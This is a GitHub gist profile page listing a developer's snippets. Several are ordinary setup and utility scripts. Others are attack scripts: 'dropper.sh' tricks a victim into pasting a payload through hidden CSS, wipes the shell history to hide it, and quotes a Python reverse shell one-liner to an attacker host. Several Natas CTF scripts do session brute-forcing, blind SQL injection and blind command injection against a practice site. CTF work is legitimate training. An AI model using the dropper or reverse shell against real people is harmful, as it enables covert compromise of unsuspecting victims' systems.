Skip to content

Instantly share code, notes, and snippets.

View dlanner's full-sized avatar

David Lanner dlanner

7 followers · 0 following
View GitHub Profile
@dlanner
dlanner / install_jupyterlab.sh
Last active October 8, 2022 11:32
Install JupyterLab on MacOS with Homebrew, miniforge, and mamba
# Install Homebrew
if ! command -v brew &>/dev/null; then
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
fi
# Mamba can be installed by conda, which comes with miniforge
if ! command -v conda &>/dev/null; then
brew install miniforge
conda init "$(basename "${SHELL}")"
fi
@dlanner
dlanner / delete_empty_cw_log_groups.sh
Last active May 3, 2019 19:53
Scripts to clean CloudWatch logs
#!/bin/bash
aws logs describe-log-groups > log_groups.json
LOG_GROUPS=$(ruby -r json -e 'puts JSON.parse(File.read("./log_groups.json"))["logGroups"].map { |log_group| log_group["logGroupName"] }')
for log_group in $LOG_GROUPS; do
aws logs describe-log-streams --log-group-name ${log_group} > log_streams.json
IS_EMPTY_LOG_GROUP=$(ruby -r json -e 'puts JSON.parse(File.read("./log_streams.json"))["logStreams"].length == 0')
if [ "${IS_EMPTY_LOG_GROUP}" == "true" ]; then
echo "Deleting empty log group ${log_group}"
aws logs delete-log-group --log-group-name ${log_group}
@dlanner
dlanner / text_to_rgb
Created July 12, 2017 20:04
Quick method to arbitrarily convert a text string into an RGB value
def text_to_rgb text
# Get SHA-256 hash of text as hexadecimal
hexdigest = Digest::SHA256.hexdigest(text)
# Convert from hex string to decimal integer
red = hexdigest[0..1].to_i(16)
green = hexdigest[2..3].to_i(16)
blue = hexdigest[4..5].to_i(16)
return [red, green, blue]
end
@dlanner
dlanner / dropper.sh
Last active January 27, 2017 17:33
Fairly stealthily trick a victim into copying/pasting a payload onto their own system and then hide your tracks. Based on hidden CSS trick from https://lifepluslinux.blogspot.com/2017/01/look-before-you-paste-from-website-to.html
# Hide this code in HTML that will be copied/pasted using hidden CSS trick from https://lifepluslinux.blogspot.com/2017/01/look-before-you-paste-from-website-to.html
# It will execute the payload, and then erase its own lines from both the terminal screen and history (with the current exception of the first line, which will successfully be removed from history, but remain on the screen; still researching how to solve this.)
# $PAYLOAD can be a reverse shell like from here http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# Example:
# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$YOUR_HOST",$YOUR_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
stty -echo
(eval "$PAYLOAD" & ) && echo -e "\r"
history -w && LINE_NUM=$(history | tail -1 | awk -F ' ' '{print $1}' | xargs) && history -d $((LINE_NUM - 1)) && history -d $((LINE_NUM - 1)) && history -d $((LINE_NUM - 2)) && echo
@dlanner
dlanner / brute_force_session.rb
Created May 19, 2014 02:00
Script to brute force session id for Natas CTF Level 19
# Script to brute force session id for Natas CTF Level 19
# http://natas19.natas.labs.overthewire.org/
require 'net/http'
def find_password
raise ArgumentError, "Password required." unless ENV['NATAS19_PASSWORD']
body_containing_password = ""
bodies = []
max_id = 640
@dlanner
dlanner / brute_force_session.rb
Created April 25, 2014 01:07
Script to brute force session id for Natas CTF Level 18
# Script to brute force session id for Natas CTF Level 18
# http://natas18.natas.labs.overthewire.org/
require 'net/http'
def find_password
raise ArgumentError, "Password required." unless ENV['NATAS18_PASSWORD']
max_id = 640
(1..max_id*3/2).each do |i|
puts "Trying session id #{i}"
@dlanner
dlanner / blind_sqli_timing.rb
Created April 18, 2014 20:34
Timing-based blind command injection script for Natas CTF Level 17
# Timing-based blind command injection script for Natas CTF Level 17
# http://natas17.natas.labs.overthewire.org/
require 'net/http'
# Timing attack: querying the correct password character takes longer than querying incorrect characters.
def valid_char? n, char_code
raise ArgumentError, "Password required." unless ENV['NATAS17_PASSWORD']
puts "Trying #{n} #{char_code.chr}"
uri = URI("http://natas17.natas.labs.overthewire.org/")
@dlanner
dlanner / blind_cmd_injection.rb
Last active August 29, 2015 13:59
Blind command injection script for Natas CTF Level 16
# Blind command injection script for Natas CTF Level 16
# http://natas16.natas.labs.overthewire.org/
require 'net/http'
require 'nokogiri'
def valid_char? char, n
raise ArgumentError, "Password required." unless ENV['NATAS16_PASSWORD']
puts "Trying #{n} #{char}"
uri = URI("http://natas16.natas.labs.overthewire.org/")
@dlanner
dlanner / blind_sqli.rb
Last active August 29, 2015 13:58
Blind SQL injection script for Natas CTF Level 15
# Blind SQL injection script for Natas CTF Level 15
# http://natas15.natas.labs.overthewire.org/
require 'net/http'
# Returns true if the ASCII value of the ith character of the password is less than the ASCII value passed in, otherwise false
# Uses blind SQL injection
# Example:
# compare 1, 85
# This returns true if the ASCII value of the password's first character is less than 85, otherwise false.
@dlanner
dlanner / vagrant_switch_branch
Last active August 29, 2015 13:56
Bash script to help switch between different revision control branches in Vagrant
#!/usr/bin/env bash
# Usage: ./vagrant_switch_branch 1.0
# export APP_ROOT=/path/to/my_app
# export CURRENT_BRANCH=$APP_ROOT/current_branch
if [ ! -n "$APP_ROOT" ]; then
echo "Error: APP_ROOT is not defined"
exit 1
elif [ ! -n "$CURRENT_BRANCH" ]; then
echo "Error: CURRENT_BRANCH is not defined"